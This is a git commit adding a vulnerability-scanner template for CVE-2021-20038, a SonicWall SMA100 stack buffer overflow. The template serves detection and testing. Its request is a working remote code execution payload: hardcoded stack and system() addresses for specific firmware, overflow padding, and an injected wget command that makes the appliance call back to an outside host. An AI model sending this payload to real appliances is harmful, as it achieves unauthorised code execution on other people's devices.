Add CVE-2021-20038 (#3542)

* Add CVE-2021-20038 * misc: Update author
2022-01-18 12:20:14 +07:00 · 2022-01-18 12:20:14 +07:00 · b8dabfbcbb
parent 7c30910d69
commit b8dabfbcbb
1 changed files with 37 additions and 0 deletions
--- a/cves/2021/CVE-2021-20038.yaml
+++ b/cves/2021/CVE-2021-20038.yaml
@ -0,0 +1,37 @@
+id: CVE-2021-20038
+
+info:
+  name: SonicWall SMA100 Stack BoF to Unauthenticated RCE
+  author: dwisiswant0, jbaines-r7
+  severity: critical
+  description: |
+    A Stack-based buffer overflow vulnerability in SMA100
+    Apache httpd server's mod_cgi module environment variables
+    allows a remote unauthenticated attacker to potentially
+    execute code as a 'nobody' user in the appliance.
+    This vulnerability affected SMA 200, 210, 400, 410 and 500v
+    appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv,
+    10.2.1.2-24sv and earlier versions.
+  reference:
+    - https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis
+  tags: cve,cve2021,overflow,rce,sonicwall
+
+requests:
+  - raw:
+      - |
+        GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1
+        Host: {{Hostname}}
+
+    attack: clusterbomb
+    payloads:
+      prefix_addr:
+        - "%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf" # stack's top address
+      system_addr:
+        - "%08%b7%06%08" # for 10.2.1.2-24sv
+        - "%64%b8%06%08" # for 10.2.1.1-1[79]sv
+
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the HTTP Interaction
+        words:
+          - "http"